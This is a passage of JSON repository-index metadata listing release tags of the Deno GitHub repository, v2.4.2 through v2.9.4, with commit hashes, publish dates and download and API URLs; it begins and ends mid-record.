6-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependen